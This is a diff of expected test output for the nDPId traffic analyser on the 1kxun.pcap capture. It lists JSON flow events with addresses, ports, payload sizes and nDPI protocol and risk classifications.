-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385129508,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":627,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1654385184927,"flow_last_seen":1654385185032,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":239007,"flow_avg_l4_payload_len":3918,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1654385136207,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":179965,"flow_avg_l4_payload_len":5141,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1654385136206,"flow_last_seen":1654385180918,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":23040,"flow_tot_l4_payload_len":523278,"flow_avg_l4_payload_len":6381,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127244,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1654385229374,"flow_last_seen":1654385236412,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8604,"flow_avg_l4_payload_len":537,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385136215,"flow_last_seen":1654385137803,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":264022,"flow_avg_l4_payload_len":7333,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385128878,"flow_last_seen":1654385130178,"flow_idle_time":7580000,"flow_min_l4_payload_len":496,"flow_max_l4_payload_len":2746,"flow_tot_l4_payload_len":4982,"flow_avg_l4_payload_len":1245,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1654385136216,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":37440,"flow_tot_l4_payload_len":124465,"flow_avg_l4_payload_len":8890,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385128878,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"flow_min_l4_payload_len":817,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":844,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385129449,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":1181,"flow_avg_l4_payload_len":590,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":80,"flow_first_seen":1654385140171,"flow_last_seen":1654385145302,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":8640,"flow_tot_l4_payload_len":177845,"flow_avg_l4_payload_len":2223,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385139579,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1384,"flow_avg_l4_payload_len":692,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":2549,"packets-processed":2549,"total-skipped-flows":0,"total-l4-payload-len":4952452,"total-not-detected-flows":14,"total-guessed-flows":6,"total-detected-flows":177,"total-detection-updates":22,"total-updates":0,"current-active-flows":0,"total-active-flows":197,"total-idle-flows":197,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1083,"global_ts_msec":1654385236487} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184174,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":1374,"flow_avg_l4_payload_len":687,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156962,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"flow_min_l4_payload_len":682,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1794,"flow_avg_l4_payload_len":897,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156971,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"flow_min_l4_payload_len":766,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1880,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156978,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"flow_min_l4_payload_len":508,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1626,"flow_avg_l4_payload_len":813,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156997,"flow_last_seen":1654385157178,"flow_idle_time":7580000,"flow_min_l4_payload_len":680,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1793,"flow_avg_l4_payload_len":896,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385157001,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":1023,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385141046,"flow_last_seen":1654385141076,"flow_idle_time":7580000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":2351,"flow_avg_l4_payload_len":587,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385235892,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1663,"flow_avg_l4_payload_len":831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1654385143337,"flow_last_seen":1654385143386,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":20884,"flow_avg_l4_payload_len":1898,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385232006,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":668,"flow_tot_l4_payload_len":1227,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385229375,"flow_last_seen":1654385231942,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3139,"flow_avg_l4_payload_len":523,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385229377,"flow_last_seen":1654385229406,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385232040,"flow_last_seen":1654385234239,"flow_idle_time":7580000,"flow_min_l4_payload_len":598,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":3050,"flow_avg_l4_payload_len":762,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183491,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":1204,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183496,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":1640,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":1215,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183495,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":1191,"flow_avg_l4_payload_len":595,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183618,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":1485,"flow_avg_l4_payload_len":742,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127293,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":734,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119050,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119973,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385120896,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1654385232158,"flow_last_seen":1654385232180,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2540,"flow_avg_l4_payload_len":508,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229378,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"flow_min_l4_payload_len":353,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1602,"flow_avg_l4_payload_len":801,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1654385131029,"flow_last_seen":1654385180912,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":635658,"flow_avg_l4_payload_len":5996,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385181857,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":983,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":696,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 